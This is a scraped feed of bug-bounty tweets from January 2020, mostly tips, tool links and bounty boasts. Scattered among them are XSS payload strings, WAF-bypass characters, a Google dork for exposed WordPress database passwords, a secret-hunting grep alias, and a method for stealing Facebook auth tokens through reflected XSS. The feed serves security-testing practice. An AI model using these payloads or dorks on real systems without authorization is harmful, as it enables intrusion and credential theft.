Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-19 22:00:04
0 I wrote a small guide with some common techniques to bypass WAF, focus on SQL injection.. https://t.co/MjI0yCtJ7V #bugbountytips #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2020-01-19 20:43:51
4 -Sample penetration testing report: https://t.co/crnmtmack8 -Tips on writing a penetration testing report:: https://t.co/BRfhyllyLe -Technical penetration report sample:: https://t.co/3XGsBppDN4 -Nessus sample reports: https://t.co/xaKxlGxtkj #bugbountytip #Hacking #PenTest
Hussein Daher
@HusseiN98D


2020-01-19 20:18:45
5 I must say sorry to all my #bugbounty and #infosec followers for being off for the past month. But no worries, I'll come back with exciting news soon. I'll be hiring too! Stay tuned for a #bugbountytip tomorrow 🎉
inc0gbyt3
@incogbyte


2020-01-19 20:06:29
1 I wrote a small guide with some common techniques to bypass WAF, focus on SQL injection.. https://t.co/uM6v58Ufzt #bugbountytips #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-19 19:51:19
0 One liner to get root domains, by @nahamsec #bugbountytip cat hosts | rev | cut -d "." -f 1,2,3 | rev | sort -u
Anshuman Pattnaik
@anspattnaik


2020-01-19 03:12:24
0 #BugBounty #bugbountytip Found many open ports for a target port 22 - ssh (required password) port 21 - FTP (required password) port 445 - SMTP (required password) port 53 - domain (Possible Dos attack) port 8443 - Admin login page (required password) Should I report it?
Kyle
@B3nac


2020-01-19 02:52:16
0 If the default login request is POST check in Burp if GET is allowed and append the post attributes. For example. https://example . com/login?&username=TotallySecure&password=hunter2 If there is no CSRF token $. #bugbountytip
myo ko
@nutronex


2020-01-19 02:41:59
0 #bugbountytips #bugbountytip tagged as duplicate after 2 weeks :) https://t.co/5aOJw8BEjE
thehackerlab.io
@the_hacker_lab


2020-01-19 00:03:03
2 Rewrote my recon bot to output to markdown and upload to a git server and I love it, next step is to make it a docker container so I can swarm all the wildcards #BugBounty #hackerone #bugcrowd #bugbountytip Only a few of the steps are shown here but add it to your workflow
thehackerlab.io
@the_hacker_lab


2020-01-18 23:45:21
0 Over 50 Domains with XSS found this week on an old AF public program.. then triaged by hackerone.. it was raining alert(https://t.co/7GXCCGXJgp) #bugbountytip Just keep looking....... the bugs are out there !
bugbountytip
@a_l_e_r_t_1_


2020-01-18 18:12:20
1 GET /xyz 404 NOT FOUND GET /xyz/abc 200 OK GET /xyz 403 FORBIDDEN GET /xyz/abc 200 OK Look everywhere !!! #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-18 16:45:48
0 Site: If a post get 1000+ report abuse then site will automatically delete post. h1_squirtle: Clicking the "Report Abuse Button" 1000 TIme. ============= BOOM Post Deleted ============= $$ 300 $$ Profile: h1/h1_squirtle https://t.co/lWhHQIrwEC #bugbountytips #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-01-18 12:45:49
0 Task: Find flag, and send your flag to me Hint: It looks like binary but it's not that Don't share your flag Flag Type - NULLCROWD*{} I'll post a solution when the challenge is closed Attachment: https://t.co/x0VIjoGjFT Password - nullcrowd* #bugbountytips #bugbountytip #ctf https://t.co/SXe1drnzLP
dark_warlord14
@dark_warlord14


2020-01-18 08:18:29
0 Guide on how to proxy https traffic from emulator via burpsuite. It works. https://t.co/su35MeoCU4 #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-01-18 06:22:31
0 Hakrawler - Simple, Fast Web Crawler Designed For Easy, Quick Discovery Of Endpoints And Assets Within A Web Application https://t.co/WQ22tfAnmm #bugbounty #bugbountytips #bugbountytip #bugbounty2020goals
ｙｏｄｈｈａ
@y0dhha


2020-01-18 06:21:28
0 1) Cable Haunt Vulnerability Haunts Cable Modems Using Broadcom Chips https://t.co/TTH8SCVSqa 2) Testing for XSS (Like a KNOXSS) https://t.co/kvdt9AjTKQ 3) Hacking Java Deserialization https://t.co/MnvJmuTvaJ #bugbounty #bugbountytip #bugbounty2020goals
Jason
@zeroauth


2020-01-18 02:44:11
0 Want to hear a Bounty Hunter fail? my ImageTragick test payloads this entire time had a typo of my callback address, so this entire time testing image uploads were worthless, and I never documented where they were... #bugbountytip #bugbountytips
healthyoutlet
@healthyoutlet


2020-01-17 22:42:44
0 Click-to-copy feature for an API key? Check for x-frame-options / frame-ancestors. If you can frame the page you can clickjack the key with just a click and a ctrl-v. #BugBountyTip
thehackerish
@thehackerish


2020-01-17 18:00:06
1 #bugbountytip: If you are struggling to run #hashcat on your host, you may want to run it in #docker instead. I've had success with it, cracking 6 passwords in an assignment. https://t.co/S81qOwyOWs
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 17:17:15
0 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/1zOHSPhURn …
Karna
@karna__1


2020-01-17 17:06:08
0 #BugBountyTip #bugbountytips #infosec Yep. A huge difference indeed! When you feel all down and exhausted and messed up, just go get some sleep! Chances are you'll wake up the next day with a different kind of energy :) Take rest and get merry @ArchAngelDDay <3 https://t.co/HKXAMiM37m
B.S aymen
@depression0x01


2020-01-17 11:02:02
0 Anyone here is using RSS feeds ? and which channels are u following for being aware about new CVE's I can't find nist cve channel ? #Security #BugBounty #bugbountytips #BugBountyTip #RSS_FOR_ALL #CVE
Sayaan Alam
@ehsayaan


2020-01-17 08:02:07
0 Just Submitted a Critical Subdomain Takeover to Account Takeover Vulnerability.... Hope For the Best!!! #Hacked #bugbounty #BugBountyTip
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 06:34:36
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/ZBC76PiwTP
Paulos Yibelo
@PaulosYibelo


2020-01-17 05:26:30
2 This is one common way for me to find high severity auth bypass vulnerabilities in high profile targets. Example: https://t.co/9GffzeEp0m #bugbounty #bugbountytip https://t.co/mrgnQhnue5
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 01:20:06
2 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/8x01PWjpmW
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 00:50:46
2 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-17 00:15:30
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/qibBdtN35d
Mrityunjoy
@mitunjoy11


2020-01-16 17:06:55
2 #BugBountyTip When you are looking for bugs on a program, always check for the program's browser extensions, sometimes you can get some cool SSRF ;) https://t.co/b1a1zitFjS
siLLyDaDDy
@sillydadddy


2020-01-16 15:50:38
3 #bugbounty #bugbountytip #hacking New platform for bug hunting ...join fast !!!! https://t.co/bqBhpeLOtz
Ammar Amer🇸🇾
@cry__pto


2020-01-16 13:34:57
4 Using CeWL to map a website to build a custom wordlist(for password crackers),using words and phrases scraped from the target web pages: cewl -v -d 2 -m 5 -w results http://xx.xx.xx.xx/home/ -d=Depth to spider -v=Verbose output -m=Minimum word length #bugbountytip #Hacking
intigriti
@intigriti


2020-01-16 13:02:13
36 So you believe UUID's are a sufficient protection against IDOR's? Think again! 🤦 Thanks for the #BugBountyTip, @securinti https://t.co/zx5Xn7iDrE
BSides Ahmedabad
@bsidesahmedabad


2020-01-16 09:02:11
4 Closing note of @stokfredrik at #bsidesahmedabad #bugbountytip #bugbounty #infosec https://t.co/eKeJK1PmYf
Ahmed M. Elhady
@Br3akm30ut


2020-01-15 20:04:58
5 Always try to check SSTI Vuln on username params in password reset pages or any mail endpoint, + try fuzzing the same payload in other inputs, cuz may the payload reflect on the body of the mail and not - lemme say for example - in the account details. #bugbountytip #BugBounty
dark_warlord14
@dark_warlord14


2020-01-15 17:08:32
0 inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles This google dork is scary as shit. #bugbountytip https://t.co/vWkHcHIMDN
@cr33pb0y
@theyiyibest


2020-01-15 06:56:09
0 Yay, I was awarded a $XXX bounty on @Hacker0x01! First RXSS of the year. Payload: [1].map(alert) https://t.co/7vrkzfnbNA #TogetherWeHitHarder #bugbountytip #wafbypass
Eduard Tolosa
@Edu4rdSHL


2020-01-15 05:54:39
0 @Docker The image size is just 41MB! Special mention to @Spaceprogrammer for the idea and initial dockerfile! #bugbounty #bugbountytips #bugbountytip #osint #recon #tools
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-14 23:52:49
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/FzqCz83DY3
bugbountytip
@a_l_e_r_t_1_


2020-01-14 22:05:09
0 Can I bypass it ? Any suggestions ? ( \ ) #bugbountytips #bugbountytip https://t.co/WshiSHcmrM
Hasan
@hasan_zmzm


2020-01-14 20:20:14
0 Simple #1 rule. #BugBountyTip https://t.co/rUq3znRuov
Nick || hunt4p1zza
@ngkogkos


2020-01-14 19:08:56
3 Just spent about an hour to bypass an odd filter for a content spoofing/HTML injection flaw in automated emails. Had to 1) Avoid using spaces (see use of / in image), 2) Perform parameter pollution on the "username" field to have multiple HTML elements. #bugbounty #bugbountytip https://t.co/5KxNTLvx4l
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 17:50:39
2 Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win. #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #CyberSecurityTraining #devsecops #cybersecurity #training #ceh #eccouncil #certification #hackerone
Zero Xyele
@zeroxyele


2020-01-14 17:50:29
0 Get intelligence alerts from your targets using by https://t.co/ceSFlbIYul! (@_IntelligenceX) #hackerone #hacker101 #bugbounty #bugbountytip #bugbountytips #bugcrowd #intelligence https://t.co/rj4FQavyU0
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 17:34:50
1 Active Directory Visualization for Blue Teams and Threat Hunters https://t.co/exGykctRyY Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
AkaaZaan
@AkaaZaan


2020-01-14 16:28:30
0 I am giving out $300 to the one who shares a working tip on bypassing Authorization bearer header. #Bugbountytip
robre
@_robre


2020-01-14 15:01:25
0 Create a list of interesting keywords for grep: $ printf 'password\ntoken\nsecret\nusername\n' > ~/dict/words.txt $ alias secgrep='grep -f ~/dict/words.txt' $ secgrep -r somedir/ somedir/file.php: dbpassword: hunter2 #BugBountyTip #bugbountytips #hacking @TomNomNom
reconness
@reconness


2020-01-14 14:01:58
1 Working on screenshot Agents feature #bugbountytips #BugBountyTip #bugbounty2020goals
Mashoud1122
@mashoud1122


2020-01-14 10:21:07
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/NIuW4ennqY
Imran Parray
@CreedHackers


2020-01-14 09:57:31
0 @tirtha_mandal @synack @SynackRedTeam Since you have added #BugBountyTip as a hashtag in your tweet, I would like to know how this tweet is a bug bounty tip.
Israel Thomas
@IsraelThomas_7


2020-01-14 09:05:29
0 I just love SSL misconfigurations! :) #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 07:04:51
0 https://t.co/AQ1isKOUi5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #cybersecurity
Mourad
@SecuAudit


2020-01-14 04:03:59
0 I need someone who speaks Vietnamese. #bugbounty #BugBountyTip
Mashoud1122
@mashoud1122


2020-01-14 01:22:50
1 Using A Reflected XSS to steal FB Auth Tokens[increase impact] if login with facebook is available use the rxss to reflect the location hash. Put the rxss url in the facebook auth flow[ redirect_uri ]. See the magic view the pic for more #BugBountyTip #BugBountyTips #BugBountyTip https://t.co/xKExO8OAcp
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-14 00:58:52
0 Here is another write up for 2fa bypass. https://t.co/CDff0sKP0U … #hacking #bugbountytip #infosec #writeup
dark_warlord14
@dark_warlord14


2020-01-13 18:57:01
0 Hacked up alias for ffuf to store all search results so you can look at them later. #bugbountytips #bugbountytip https://t.co/uDTJUGMTj1
Nick || hunt4p1zza
@ngkogkos


2020-01-13 17:58:38
0 If a subdomain returns a default/under construction or dead page, it may still be worth to run it through @hacker_'s getallurl + @TomNomNom's concurl tools to request all URLs & identify any URLs with different response. See image for commands. #BugBounty #bugbountytip https://t.co/YNXB7uamRY
Numan ÖZDEMİR
@numanozdemircom


2020-01-13 17:57:25
0 Who wanna find Critical (P1) vulnerabilities just in 10 seconds? An easy bounty tip for you. [PHP] Exposing DB Credentials / HttpOnly Bypass / Full Path Disclosure https://t.co/t08E7xzvG5 #BugBounty #bugbountytips #bugbountytip
Ebrahim Hegazy
@Zigoo0


2020-01-13 13:11:57
11 #BugBountyTip When using #Nmap as part of your #Recon arsenal, make sure to add --data-length=50 (or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open). #TBC
Yadhavi
@PrincessYadhavi


2020-01-13 12:44:10
0 Can I report Exposed google map api key on @Bugcrowd platform program? Is it valid bug? #bugbounty #bugbountytip #bugbountytips
Arif Khan
@payloadartist


2020-01-13 11:56:33
1 I'm surprised at how often companies use these credentials in internal login panels: company_name company_name admin company_name employee_name (/github username/from LinkedIn/any public source) company_name #bugbounty #bugbountytip #infosec
Tirtha Mandal
@tirtha_mandal


2020-01-13 09:45:30
1 Thursday's full night hunting finally paid off by @synack. Good start of 2020. Thank you @synack @SynackRedTeam #xss #bugbounty #synack #srt #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/WQWiJCtNPD
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-13 09:22:00
0 When mapping an application, pay special attention to all HTTP requests (i.e. GET and POST), as well as every parameter and form field that is passed to the application. #BugBountyTip #CyberSecurity #infosec https://t.co/D9QWw9BxWm
Lokesh Sonagra
@Anonx_pro


2020-01-13 01:51:02
2 Top Bug Bounty Tools 1. Burp Suite 2. Vulnerability Lab 3. Google Dorks 4. DNS Discovery 5. WAPITI 6. INalyzeR #hackerone #hackers #hack #bugbounty #bugcrowd #python #sqlinjection #programmers #hacks #bugbountytip #ruby #indianhackers #ssrf #developers #bughunters #xxe #hacker
Jason
@zeroauth


2020-01-13 00:35:15
0 Just made a small blog post detailing how I used Frida to bypass SSL cert pinning on a custom cert pinning integration. App developer made their own function instead of using the X509TrustManager. https://t.co/OfYS6ofaBP #bugbountytip #bugbountytips
QSoloX
@QSoloX


2020-01-12 18:27:05
0 How common do you guys find http parameter pollution exploits? Just watched a video from @PwnFunction and was very intrigued about it. It's one of those things that even just a month ago I would have never thought to be possible. #bugbountytip #bugbounty #hacking
Petko D. Petkov
@pdp


2020-01-12 17:48:04
0 Access to the right tools makes a huge difference when doing pentests and bug bounty hunting. How do you know which tool is good/right? Here is the deal. Good tools ultimately save you time - loads of time. #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-12 13:28:27
0 OLD IS GOLD for @bobby6102000 HACKED NORD VPN OLD WD VERSION $$$$$$$$$$$$$$$$$ BOUNTY $500 $$$$$$$$$$$$$$$$$ READ HERE https://t.co/jSxpimqExU #bugbountytips #bugbountytip BTW BOBBY BRUH #IndiaRejectsCAA_NRC_NPR
Pratik Dabhi
@impratikdabhi


2020-01-12 13:18:08
1 Payload for test XSS , SQLI , SSTI vulnerabilities. '"><svg/onload=alert()>{{7*7}} #Payload #XSS #SQLI #SSTI #BugBountyTip
WebSecurityIT
@WebSecurityIT


2020-01-12 12:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbount…
WebSecurityIT
@WebSecurityIT


2020-01-12 09:30:00
1 RT @godzilla74: Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
d0nut
@d0nutptr


2020-01-12 08:44:07
2 If example[.]com points to IP 1.2.3.4 and redirect to www[.]example[.]com but www[.]example[.]com doesn't point to anything (No A, AAAA, CNAME), try submitting your HTTP request to http://1.2.3.4/ with a "HOST: www[.]example[.]com" header. #bugbountytip #bugbountytips
WebSecurityIT
@WebSecurityIT


2020-01-11 20:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbount…
Rafael Cintra
@RafaelCintraSec


2020-01-11 17:24:37
0 shx_webgame - Resolvendo CTF - Shellter Labs https://t.co/H5AZAr9OaR #hacking #ctf #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2020-01-11 17:00:01
11 New video incoming! 🚨 In this video, we talk APIs. What they are, where to find them, and most importantly how to test them for bugs! We cover: API recon, the most common API bugs and teach you how to find them #bugbountytip #BugBounty #CyberSecurity https://t.co/3hDwOizxwl https://t.co/kPHof1JHtp
ｙｏｄｈｈａ
@y0dhha


2020-01-11 14:52:41
0 Awesome Hacking Tool Lists https://t.co/LauqqrTZ82 #bugbounty #bugbountytips #bugbountytip #android #webpentest #Malware #penteset
Fisher
@Regala_


2020-01-11 14:06:44
2 Tip that has been shared a thousand times but to reiterate: always make a video POC in your reports. It takes 2 minutes and you're covering your future self in case things get fixed, environment change, shit lits on fire. #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-11 03:29:38
1 One line to extract urls from a folder #bugbountytip grep -oriahE "https?://[^\"\\'> ]+" *
Abhishek 🕵️
@abhishake100


2020-01-10 17:55:32
2 I just published "My First RCE (Stressed Employee gets me 2x bounty 🤑)" #bugbounty #bug #bounty #bugbountytip https://t.co/11GF7bsr8J
Sourav Sahana
@kernel_rider


2020-01-10 15:34:51
0 Here is another write up for 2fa bypass. https://t.co/ORu7ZWvJjP #hacking #bugbountytip #infosec #writeup
Justin Farmer
@godzilla74


2020-01-10 15:14:02
0 Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-10 09:22:02
4 When doing search engine reconnaissance, do not limit testing to just one search engine provider, as different search engines may generate different results. 🧑‍🤝‍🧑👯 #pentesting #CyberSecurity #infosec #OSINT #BugBountyTip https://t.co/z3TAwSxZnB https://t.co/SD8uQVh5XC
Digital Business News
@DASummerCamp


2020-01-10 05:15:00
0 In this week's blog, iBaibhavJha writes about how he found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/SJLKTZSdRs
Nassec.io
@nassecio


2020-01-10 04:47:33
2 In this week's blog, @iBaibhavJha writes about how he found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/tYuY4jldiV
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-10 02:19:15
1 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/zUtp0QmdQK
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-10 00:54:18
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/0GODNlKoK3
Daher Mohamed
@DaherMohamed4


2020-01-09 17:25:00
0 Approx 5k$ bounties for multiple Admin Blind XSS Injection. Thanks @IAmMandatory @Bugcrowd #bugbountytip #bugbountytips Used xsshunter tool for blind xss(s) https://t.co/3vBS224SI2
Renwa
@RenwaX23


2020-01-09 15:22:02
0 OnePlus Bug Bounty Program is Scam #bugbountytip
Oghenejivwe 🇳🇬🗯
@realOghenejivwe


2020-01-09 14:35:34
0 There are very few things on earth more frustrating than spending hourssssssss, looking for bugs and finding none..Worse still in a CTF program! 😑 #bugbounty #bugbountytip #bugbounty2020goals
LivEdOverflow 🔴
@LivEdOverflow


2020-01-09 13:35:27
1 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @̶L̶i̶v̶e̶O̶v̶e̶r̶f̶l̶o̶w̶ @EdOverflow! https://t.co/IoLsH8w4aQ https://t.co/aK4FU9iZ6z
intigriti
@intigriti


2020-01-09 13:05:16
13 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @̶L̶i̶v̶e̶O̶v̶e̶r̶f̶l̶o̶w̶ @EdOverflow! https://t.co/bAE0snqYcZ
Rafin Rahman Chy
@rafinrahmanchy


2020-01-09 12:48:21
0 @intigriti It's not a #bugbountytip 😒
Larouanne Tristan
@Tr4LSecurity


2020-01-09 12:10:14
0 Following the release of the MavenDecoder, here is an article on how to use #maven repository, secure them, and unsecure them: https://t.co/etGTIW5Div #pentest #bugbountytip
Rushiikesh
@u1tran00b


2020-01-09 08:47:01
0 Thank you so much for the awesome swag @Bugcrowd.... Waiting for the P1 Warrior Level 3 swag pack now.... Thanks for being a great platform.... If you are a newbie start your journey with #Bugcrowd #bugbounty #bugbountytips #bugbountytip ❤️❤️ https://t.co/ndXSnTmFpN
Mufeed VH
@mufeedvh


2020-01-08 15:46:26
9 Hey all, I started a youtube channel on bug bounties, programming, and security. This is my first video, an intro about me and the channel. I hope you guys are into memes and stuff. :) https://t.co/U99UY5w2cR #bugbounty #bugbountytip #infosec
STÖK
@stokfredrik


2020-01-08 15:28:44
30 Bug Bounty hunters & Pentesters alike, they all love to run their own domain and DNS Servers to log Out of Band interactions caused by RCEs, XXE's SSRFs and blind requests. And now you can do that too! Better safe than sorry! https://t.co/BgEpHIzjZr #bugbountytip #infosec #howto https://t.co/W5DyPENH5z
Aman Mahendra
@amanmahendra_


2020-01-08 10:44:39
0 Thanks @Hacker0x01 for this amazing hoodie 🔥 #bugbountytip #togetherwehitharder https://t.co/pU6HqPMPC9
Ammar Amer
@cry__pto


2020-01-08 10:06:05
6 #BugBounty tools part (5): HTTPScreenShot:https://t.co/qIuJA1SuJW SubBrute:https://t.co/5i2SI5Dzn7 OnlineHashCrack:https://t.co/zkqBbBh4un Wfuzz:https://t.co/qCK5ghmU5H LinkFinder:https://t.co/k015xUNhCm aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Christian Folini
@ChrFolini


2020-01-08 09:25:13
0 Working on my first blog post of the year: fingerprinting the #OWASP ModSecurity @CoreRuleSet This is surprisingly difficult, but I do not like security by obscurity, so here we go! #WAF #CRS3 #BugBountyTip
m0z
@LooseSecurity


2020-01-08 01:06:16
6 Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbounty #infosec #CyberSecurity
Tragger Osbourne
@OsbourneTragger


2020-01-07 17:40:48
0 I am reverse engineering the program I made a few years ago and trying to develop some exploits, I hope 🤞, I will find some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/NtQPLB8oZt
Tragger ⚡️☄️
@NyataraOsborne


2020-01-07 17:35:05
0 I am reverse engineering the program I made a few years ago and trying to develop some exploits, I hope 🤞, I will find some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/waG51ZWIUX
Arif Khan
@payloadartist


2020-01-07 16:38:14
0 Excellent article by @streaak on his recon methodology #bugbounty #bugbountytip https://t.co/UqLBT5AJ3r
AkaaZaan
@AkaaZaan


2020-01-07 16:31:07
0 I want file upload payloads. Anyone guide me to some repository? #bugbountytip
Cryptographer
@crypt0gr4ph3r


2020-01-07 14:55:43
0 #bugbountytip I don't know how and why, I changed the expired token value from xxxxb to xxxxB, and it works 🤣 #hackerone #bugcrowd #bugbounty #hacker101
Sanketh Sharath
@sharathsanketh


2020-01-07 13:20:48
2 The need for making notes and having an organized methodology in bug bounty hunting https://t.co/kgFctJB2PV #bugbounty #bugbountytips #bugbountytip #webhacking
Yassine Aboukir
@Yassineaboukir


2020-01-07 10:21:11
2 I like decompiling older versions of android mobile apps to find deprecated API legacy endpoints as well as hardcoded creds which are surprisingly valid most often. You may use this mirror website for that purpose https://t.co/coCgEd89ly #bugbountytip
Dewanand Vishal
@dewcode91


2020-01-07 05:29:34
0 People who don't know how to approach a target app in bug bounty. Please Read Web Application Hackers Handbook- Chapter4. #intigriti #bugbountytip
GokhanGK
@gkhck_


2020-01-06 20:34:59
2 My first bug bounty writeup. It was a bit inexperienced but I wanted to share :) #bugbountytips #bugbountytip #infosec https://t.co/JGLTMr4BMK
Ammar Amer
@cry__pto


2020-01-06 16:22:32
5 Practice part (3): https://t.co/WPU9fCoxTd https://t.co/ZwkDd9pnFd https://t.co/XUfNhHJFmk https://t.co/XrESMMzbPD https://t.co/e61c34U8tC https://t.co/vLZjeXTwtQ https://t.co/XHVhlnzJjb https://t.co/7okAXhgpZt #bugbountytip #Hacking #PenTest
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-06 13:42:55
0 Every Hacker Will Agree ! 📲🏆💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gesA7tYLqX
dark_warlord14
@dark_warlord14


2020-01-06 11:23:43
0 What can you do with ffuf? 1. Directory bruteforcing 2. Parameter discovery 3. Vhost bruteforcing 4. Parse waybackurls data filtered by status code, response length It's extremely fast. With 200 threads on 1gb ram VPS, I can get 1000 requests per second easily. #bugbountytip
Dan Cimpean
@DanCimpean


2020-01-05 23:11:44
0 GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties #bugbountytip #bugbounty #infosec https://t.co/ojMfeteDaT
Khaled Mohamed
@xelkomy


2020-01-05 22:06:43
2 Tool #XSpear is very great. @hahwul thanks very much for this tool😅 #bugbountytips #bugbountytip #infosec #xelkomy
Shaked Klein Orbach 🇮🇱
@shakedko


2020-01-05 21:28:25
2 First time I hear about AppBandit by @websecurify (https://t.co/w2W2Rt6205). Have you heard about it? Is it any good? UI seems nicer than Burp's #BugBounty #BugBountyTip #Infosec
ｙｏｄｈｈａ
@s0umadip


2020-01-05 20:06:16
0 awesome-forensics:- A curated list of awesome forensic analysis tools and resources. https://t.co/v9MDCYiQnN #bugbounty #bugbountytips #bugbountytip #forensics https://t.co/bvm7JNYaw0
ｙｏｄｈｈａ
@s0umadip


2020-01-05 19:49:57
0 Offensive Security Wireless Attacks - WiFu v3 https://t.co/i77ZcVJyiK InfiniteSkills - Mastering Python -Networking and Security https://t.co/PwaSg3aXtV Chosen Books for easiest road to OSCP from my experience https://t.co/8fnP5BkVBi #bugbounty #bugbountytips #bugbountytip
Tirtha Mandal
@tirtha_mandal


2020-01-05 13:44:26
2 I would like to thank my good friend @brutelogic for helping me to bypass WAF❤️❤️ It worked like magic. #xss #wafbypass #bugbountytip #bugbounty
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:43:38
0 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:40:51
0 "--!><Script%20/K/>confirm(document.domain)</Script%20/K/> 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ '%22--%3E</style></scRipt><scRipt>alert('XSS')</scRipt> "><img src=x onerror=confirm(1);> #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 06:01:38
1 Stay #CyberSafe Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gyc6PziIKB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 05:57:33
0 Gmail ShortCuts ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pkHRBQI2KK
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 04:28:29
